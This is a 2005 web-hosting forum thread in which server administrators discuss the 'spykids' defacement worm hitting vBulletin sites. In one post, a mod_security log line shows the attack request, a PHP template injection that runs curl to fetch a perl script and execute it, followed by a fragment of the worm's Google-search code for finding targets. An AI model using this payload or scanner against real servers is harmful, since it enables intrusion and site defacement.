The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

spykids ownz your server

Discussion in 'General Discussion' started by asmithjr, Mar 6, 2005.

  1. asmithjr

    asmithjr Well-Known Member

    Joined:
    Jun 13, 2003
    Messages:
    475
    Likes Received:
    1
    Trophy Points:
    18
  2. internetfab

    internetfab Well-Known Member
    PartnerNOC

    Joined:
    Feb 20, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Gothenburg, Sweden
    cPanel Access Level:
    DataCenter Provider
  3. asmithjr

    asmithjr Well-Known Member

    Joined:
    Jun 13, 2003
    Messages:
    475
    Likes Received:
    1
    Trophy Points:
    18
    yep I see it on most links to the site.

    I find nothing on the net. What to do to prevent this on our servers?
     
  4. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    They seem to be hitting alot of sites, my guess is vulnerable php scripts.
     
  5. ashd

    ashd Member

    Joined:
    Feb 19, 2005
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    Its not people its a trojan, Troj/Sown-A,
    Troj/Sown-A overwrites all files named index.* under the /home directory with the following text:
    spykids ownz your server.
     
  6. junglecat

    junglecat Well-Known Member

    Joined:
    Jul 6, 2004
    Messages:
    168
    Likes Received:
    0
    Trophy Points:
    16
    My n00b-iness is showing, but how does the trojan get on the server?
     
  7. chae

    chae Well-Known Member

    Joined:
    Apr 19, 2003
    Messages:
    145
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Auckland, New Zealand
    mod_security logs show our server being hit...

    213.202.245.143 2005-03-06 22:53:17 (null) /forums/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://xxxxxxxxxxx.com/spykids.txt%20;perl%20spykids.txt etc etc etc

    By the looks of the code it was looking for a vBulletin forum on the server:-

    ############### google
    for($n=0;$n<1000;$n += 100){
    $sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
    print $sock "GET h/search?q=%22Powered+by%3A+vBulletin%22inurl%3A$dom&num=100&hl=en&lr=&as_qdr=all&start=$n&sa=N HTTP/1.0\n\n";
    print $sock "Host: www.google.com";
     
  8. DigitalN

    DigitalN Well-Known Member

    Joined:
    Sep 23, 2004
    Messages:
    420
    Likes Received:
    1
    Trophy Points:
    18
    The wonderful propagating perl script worms attacking vulnerable php scripts - sigh :(

    Better be quick with the next kernel upgrades when the next serious vulnerability is found, or there will be a lot of hacked servers I feel.
     
  9. djmerlyn

    djmerlyn Well-Known Member

    Joined:
    Aug 31, 2004
    Messages:
    203
    Likes Received:
    1
    Trophy Points:
    16
    All your base are belong to us!

    :Sorry, just had to! LOL!:
    :D
     
  10. brentp

    brentp Well-Known Member

    Joined:
    Mar 11, 2004
    Messages:
    324
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Ayr, North Queensland, Australia

Share This Page